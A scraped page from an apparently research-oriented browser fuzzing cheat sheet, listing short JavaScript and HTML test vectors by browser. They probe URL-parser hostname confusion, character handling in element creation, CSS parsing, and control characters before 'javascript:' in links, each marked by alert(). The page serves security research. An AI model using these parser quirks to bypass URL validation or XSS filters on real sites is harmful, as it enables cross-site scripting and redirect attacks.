Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 153 vectors with results
const s = String.fromCodePoint(i);0x0D
if (escape(s).includes("%")) alert(i);Source: Characters encoded by escape()
Author: JorianWoltjer
JSJavaScript SyntaxChromeFirefoxSafari
const s = String.fromCodePoint(i);0x0D
if (encodeURI(s).includes("%")) alert(i);Author: JorianWoltjer
JSJavaScript SyntaxChromeFirefoxSafari
const s = String.fromCodePoint(i);0x0D
if (encodeURIComponent(s).includes("%")) alert(i);Author: JorianWoltjer
JSJavaScript SyntaxChromeFirefoxSafari
try{0x0D
img = document.createElement("img");0x0D
img.src=`https://example.com:1@1`;0x0D
url = new URL(img.src);0x0D
if(url.hostname != "example.com"){0x0D
alert(64);0x0D
}0x0D
} catch{}JSURL HandlingChromeFirefoxSafari
if (new URL("https://google.com:10x090x09/endpoint").hostname!="google.com"){alert(9)}Author: reindaelman
JSURL HandlingChrome
if (new URL("https://google.com:1##/endpoint").hostname!="google.com"){alert(35)}Author: reindaelman
JSURL HandlingChrome
if (new URL("https://google.com:1///endpoint").hostname!="google.com"){alert(47)}Author: reindaelman
JSURL HandlingChrome
if (new URL("https://google.com:100/endpoint").hostname!="google.com"){alert(48)}Author: reindaelman
JSURL HandlingChrome
if (new URL("https://google.com:111/endpoint").hostname!="google.com"){alert(49)}Author: reindaelman
JSURL HandlingChrome
try{0x0D
document.createElement(String.fromCodePoint(58));0x0D
alert(58)0x0D
} catch{}Author: hackvertor
JSXSS ExecutionChromeFirefoxSafariMicrosoft Edge
try{0x0D
document.createElement(String.fromCodePoint(95));0x0D
alert(95)0x0D
} catch{}Author: hackvertor
JSXSS ExecutionChromeFirefoxSafariMicrosoft Edge
try{0x0D
document.createElement(String.fromCodePoint(170));0x0D
alert(170)0x0D
} catch{}Author: hackvertor
JSXSS ExecutionChromeFirefoxSafariMicrosoft Edge
try{0x0D
document.createElement(String.fromCodePoint(186));0x0D
alert(186)0x0D
} catch{}Author: hackvertor
JSXSS ExecutionChromeFirefoxSafariMicrosoft Edge
<script>"\\"-alert(92)//"</script>XSSCharacter EncodingChromeFirefoxSafari
if(new URL("https" + String.fromCharCode(i) + "//example.com").host == "example.com") alert(i)Author: simoneonofri
JSURL HandlingSafariChrome
anchor.href="https://psres.net"+String.fromCodePoint(35)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
alert(35)0x0D
}Author: hackvertor
JSURL HandlingChromeFirefoxSafari
anchor.href="https://psres.net"+String.fromCodePoint(47)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
alert(47)0x0D
}Author: hackvertor
JSURL HandlingChromeFirefoxSafari
anchor.href="https://psres.net"+String.fromCodePoint(63)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
alert(63)0x0D
}Author: hackvertor
JSURL HandlingChromeFirefoxSafari
anchor.href="https://psres.net"+String.fromCodePoint(92)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
alert(92)0x0D
}Author: hackvertor
JSURL HandlingChromeFirefoxSafari
<a href="0x01javascript:test.com/" id="test"></a>XSSURL HandlingChrome
<a href="0x02javascript:test.com/" id="test"></a>XSSURL HandlingChrome
<a href="0x03javascript:test.com/" id="test"></a>XSSURL HandlingChrome
<a href="0x04javascript:test.com/" id="test"></a>XSSURL HandlingChrome
<a href="0x05javascript:test.com/" id="test"></a>XSSURL HandlingChrome
<style>0x0D
0x09div{color:red;}⟦0D⟧
</style>0x0D
<div id=x>test</div>0x0D
Author: hackvertor
XSSCSS ParsingChromeSafari
<style>0x0D
div{color:red;}⟦0D⟧
</style>0x0D
<div id=x>test</div>0x0D
Author: hackvertor
XSSCSS ParsingChromeSafari
<style>0x0D
0x0Cdiv{color:red;}⟦0D⟧
</style>0x0D
<div id=x>test</div>0x0D
Author: hackvertor
XSSCSS ParsingChromeSafari
<style>0x0D
0x0Ddiv{color:red;}⟦0D⟧
</style>0x0D
<div id=x>test</div>0x0D
Author: hackvertor
XSSCSS ParsingChromeSafari
<style>0x0D
div{color:red;}⟦0D⟧
</style>0x0D
<div id=x>test</div>0x0D
Author: hackvertor
XSSCSS ParsingChromeSafari